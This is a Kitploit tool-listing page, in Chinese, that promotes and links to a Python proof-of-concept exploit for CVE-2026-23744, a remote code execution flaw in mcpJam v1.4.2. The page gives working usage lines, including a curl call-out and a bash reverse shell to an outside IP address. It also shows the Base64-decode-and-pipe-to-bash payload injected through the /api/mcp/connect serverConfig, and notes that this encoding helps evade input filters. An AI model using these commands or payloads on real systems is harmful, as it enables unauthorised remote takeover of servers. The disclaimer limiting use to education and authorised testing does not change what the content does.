Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23744-poc — cve-2026-23744 python 漏洞利用 | Kitploit
工具/GitHubGitHub/keeieb79/cve-2026-23744-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubkeeieb79/cve-2026-23744-poc

CVE-2026-23744-poc

cve-2026-23744 python 漏洞利用

查看仓库
23个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-23744 — mcpJam 远程代码执行(RCE)漏洞利用程序

一个针对 CVE-2026-23744 的 Python 3 概念验证(Proof-of-Concept)漏洞利用程序,该漏洞是影响 mcpJam v1.4.2 的任意命令执行漏洞。

该工具通过在传输前将命令透明地 Base64 编码来自动化载荷传递,有助于绕过严格的输入验证和字符过滤机制。载荷在目标系统上通过 /bin/bash 包装器进行解码并执行。


功能特性

自动 Base64 载荷编码

命令在传输前会被自动编码,在针对强制实施严格输入验证或字符限制的应用程序时,可提高可靠性。

灵活的命令执行

支持任意命令执行,包括:

  • 反向 Shell(sh、bash、nc 等)
  • 系统枚举
  • 网络连通性测试
  • 自定义载荷传递

详细调试输出

显示:

  • 生成的 JSON 请求载荷
  • 原始服务器响应

这简化了故障排除和漏洞利用验证。

绕过 SSL 验证

抑制证书验证警告,允许与使用自签名或不受信任 SSL 证书的目标进行交互。


使用方法

前提条件

安装所需依赖:

root@kitploit:~
pip install requests

语法

root@kitploit:~
python3 exploit.py <target_url> "<command>"

示例

连通性测试

root@kitploit:~
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"

反向 Shell

root@kitploit:~
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"

技术细节

该漏洞利用程序通过构造恶意的 serverConfig 对象来针对 /api/mcp/connect 端点。

该载荷并非直接传输,而是先转换为 Base64 编码的字符串,再通过 Bash 执行:

root@kitploit:~
"args": [
    "-c",
    f"echo {base64_payload} | base64 -d | bash"
]

这种方法有助于规避应用层过滤,同时确保载荷完全在目标主机上解码并执行。

执行流程

  1. 用户提供的命令被 Base64 编码。
  2. 编码后的载荷被嵌入到 serverConfig 请求中。
  3. 目标服务器使用 base64 -d 解码载荷。
  4. 解码后的命令通过管道直接输入 /bin/bash。
  5. 命令以易受攻击的 mcpJam 进程的权限执行。

免责声明

[!WARNING] 本项目仅供教育目的、经授权的安全评估以及夺旗赛(CTF)环境使用。

未经明确许可对系统进行未授权使用是非法且不道德的。作者不对因使用本软件而导致的任何滥用、损害或法律后果承担责任。

下载工具